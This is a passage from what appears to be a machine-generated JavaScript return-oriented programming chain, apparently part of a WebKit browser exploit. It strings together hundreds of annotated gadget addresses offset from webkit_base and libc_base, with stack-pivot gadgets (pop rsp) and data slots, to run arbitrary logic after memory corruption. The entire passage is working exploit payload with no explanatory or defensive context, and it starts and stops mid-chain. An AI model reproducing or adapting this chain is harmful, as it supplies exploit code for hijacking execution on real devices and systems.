webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L8507:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8508:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8509:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+406040, //L8511
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+406088, //L8514
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+406056, //L8512
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L8511:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8512:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L8513:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8514:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+406200, //L8515+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+406192, //L8515
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L8515:
db([0, 0]); // 0x0
set_gadgets([
ropchain+406216, //L8515+24
ropchain+406232, //L8510
libc_base+782311, //pop rsp
ropchain+503184, //L8516
//L8510:
libc_base+764760, //pop rsi
ropchain+406272, //L8517
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L8517:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L8519:
db([4294967196, 4294967295]); // -0x64
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+406392, //L8522
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+406376, //L8520
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L8520:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8522:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+406568, //L8525
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+406584, //L8526
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+406536, //L8523
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+406552, //L8524
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8523:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L8524:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8525:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8526:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+406664, //L8527
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+406680, //L8528
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L8527:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8528:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+406776, //L8530
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+406760, //L8529
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L8529:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8530:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+406856, //L8531
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L8531:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8532:
db([112, 0]); // 0x70
set_gadget(libc_base+144605,); //pop rdi
//L8533:
db([112, 0]); // 0x70
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+407000, //L8534
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+407032, //L8536
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+407016, //L8535
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8534:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8535:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8536:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+407200, //L8538
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+407216, //L8539
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+407184, //L8537
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L8537:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8538:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8539:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+407328, //L8541
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+407376, //L8544
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+407344, //L8542
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L8541:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8542:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L8543:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8544:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+407488, //L8545+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+407480, //L8545
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L8545:
db([0, 0]); // 0x0
set_gadgets([
ropchain+407504, //L8545+24
ropchain+407520, //L8540
libc_base+782311, //pop rsp
ropchain+530624, //L8546
//L8540:
libc_base+764760, //pop rsi
ropchain+407560, //L8547
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L8547:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L8549:
db([4294967196, 4294967295]); // -0x64
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+407680, //L8552
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+407664, //L8550
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L8550:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8552:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+407856, //L8555
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+407872, //L8556
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+407824, //L8553
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+407840, //L8554
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8553:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L8554:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8555:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8556:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+407952, //L8557
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+407968, //L8558
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L8557:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8558:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+408064, //L8560
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+408048, //L8559
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L8559:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8560:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+408144, //L8561
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L8561:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8562:
db([37, 0]); // 0x25
set_gadget(libc_base+144605,); //pop rdi
//L8563:
db([37, 0]); // 0x25
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+408288, //L8564
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+408320, //L8566
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+408304, //L8565
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8564:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8565:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8566:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+408488, //L8568
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+408504, //L8569
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+408472, //L8567
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L8567:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8568:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8569:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+408616, //L8571
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+408664, //L8574
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+408632, //L8572
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L8571:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8572:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L8573:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8574:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+408776, //L8575+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+408768, //L8575
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L8575:
db([0, 0]); // 0x0
set_gadgets([
ropchain+408792, //L8575+24
ropchain+408808, //L8570
libc_base+782311, //pop rsp
ropchain+542480, //L8576
//L8570:
libc_base+782311, //pop rsp
ropchain+544992, //L8577
//L8276:
//L8306:
//L8336:
//L8366:
//L8396:
//L8426:
//L8456:
libc_base+764760, //pop rsi
ropchain+408864, //L8578
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L8578:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L8580:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+408984, //L8583
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+408968, //L8581
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L8581:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8583:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+409064, //L8584
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+409080, //L8585
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L8584:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8585:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+409240, //L8589
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+409208, //L8587
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+409224, //L8588
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8586:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L8587:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8588:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8589:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+409296, //L8591
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L8591:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+409424, //L8593
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+409440, //L8594
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+409408, //L8592
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8592:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L8593:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8594:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+409600, //L8598
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+409568, //L8596
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+409584, //L8597
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8595:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L8596:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8597:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8598:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+409656, //L8600
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L8600:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+409784, //L8602
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+409800, //L8603
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+409768, //L8601
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8601:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L8602:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8603:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+409960, //L8607
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+409928, //L8605
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+409944, //L8606
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8604:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L8605:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8606:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8607:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+410016, //L8609
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L8609:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+410144, //L8611
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+410160, //L8612
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+410128, //L8610
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8610:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L8611:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8612:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+410240, //L8613
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+410256, //L8614
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L8613:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8614:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+410352, //L8616
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+410336, //L8615
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L8615:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8616:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+410432, //L8617
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L8617:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8618:
db([120, 0]); // 0x78
set_gadget(libc_base+144605,); //pop rdi
//L8619:
db([120, 0]); // 0x78
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+410576, //L8620
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+410608, //L8622
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+410592, //L8621
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8620:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8621:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8622:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+410776, //L8624
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+410792, //L8625
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+410760, //L8623
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L8623:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8624:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8625:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+410952, //L8630
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+410968, //L8631
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+410904, //L8627
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L8627:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L8628:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L8629:
db([1, 0]); // 0x1
set_gadget(webkit_base+3236123,); //pop r9
//L8630:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8631:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+411088, //L8632+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+411080, //L8632
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L8632:
db([0, 0]); // 0x0
set_gadgets([
ropchain+411104, //L8632+24
ropchain+413312, //L8626
libc_base+764760, //pop rsi
ropchain+411144, //L8633
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L8633:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L8635:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+411264, //L8638
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+411248, //L8636
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L8636:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8638:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+411344, //L8639
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+411360, //L8640
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L8639:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8640:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+411520, //L8644
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+411488, //L8642
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+411504, //L8643
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8641:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L8642:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8643:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8644:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+411576, //L8646
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L8646:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+411704, //L8648
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+411720, //L8649
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+411688, //L8647
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8647:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L8648:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8649:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+411880, //L8653
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+411848, //L8651
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+411864, //L8652
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8650:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L8651:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8652:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8653:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
